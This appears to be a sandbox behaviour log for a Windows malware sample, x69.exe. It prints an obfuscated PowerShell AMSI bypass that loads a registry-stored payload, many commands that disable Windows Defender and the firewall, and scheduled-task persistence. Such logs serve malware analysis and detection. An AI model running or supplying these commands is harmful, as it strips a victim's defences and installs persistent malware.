C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4e50d135-7a6d-4d0f-a5bc-ef624923cc50}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3508
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1204 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:soqzriFICKPX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IWGxBxzgptDfOy,[Parameter(Position=1)][Type]$rHbiIemdzf)$pCFXamWdnuY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+'ass,'+'A'+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pCFXamWdnuY.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+'c'+'i'+'a'+''+'l'+'Na'+'m'+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',Pub'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$IWGxBxzgptDfOy).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$pCFXamWdnuY.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$rHbiIemdzf,$IWGxBxzgptDfOy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $pCFXamWdnuY.CreateType();}$IQgCZHrUAgeOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+'r'+''+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+'iv'+'e'+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+'ods');$lGFXxxMfZrJrUx=$IQgCZHrUAgeOB.GetMethod(''+'G'+'e'+[Char](116)+'P'+[Char](114)+'o'+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+'i'+'c,'+'S'+'ta'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lMUowgDplkGbOCaSZHX=soqzriFICKPX @([String])([IntPtr]);$IJcTzqqwsXVuxeflbOdmSz=soqzriFICKPX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YOrndKdnUVj=$IQgCZHrUAgeOB.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+'le').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2.'+[Char](100)+'l'+'l'+'')));$oTZslXcysVUokr=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$YOrndKdnUVj,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+'a'+'r'+'y'+[Char](65)+'')));$AooJiHWKjhuquyQjE=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$YOrndKdnUVj,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$AaJSPUX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oTZslXcysVUokr,$lMUowgDplkGbOCaSZHX).Invoke('a'+'m'+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$DmUKzttPSgYIwmfuP=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$AaJSPUX,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'fer')));$egDyXnxAlh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AooJiHWKjhuquyQjE,$IJcTzqqwsXVuxeflbOdmSz).Invoke($DmUKzttPSgYIwmfuP,[uint32]8,4,[ref]$egDyXnxAlh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DmUKzttPSgYIwmfuP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AooJiHWKjhuquyQjE,$IJcTzqqwsXVuxeflbOdmSz).Invoke($DmUKzttPSgYIwmfuP,[uint32]8,0x20,[ref]$egDyXnxAlh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue('x'+'6'+'9'+'s'+''+'t'+'a'+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:3352
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1476
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2868
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2968
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3332
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3412 -
C:\Users\Admin\AppData\Local\Temp\x69.exe"C:\Users\Admin\AppData\Local\Temp\x69.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3708
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2412
-
-
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4120
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9942.tmp\9953.tmp\9954.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:4440
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5032 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:1404
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4308 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4160
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:3400
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:3772
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:4904
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:4056
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1896
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3756
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2844
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4348
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4540
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:2424
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:3016
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:404
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:4308
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4160
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4460
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:1680
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:4320
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:1432
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:1852
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:4720
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:4556
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:1676
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:848
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:3672
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:4692
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:4240
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1580
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:3224
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1712
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:3596
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4840
-
-
C:\Users\Admin\AppData\Roaming\x69install.exe"C:\Users\Admin\AppData\Roaming\x69install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exeC:\Users\Admin\AppData\Local\Temp\iyMbXS.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2864
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2092
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
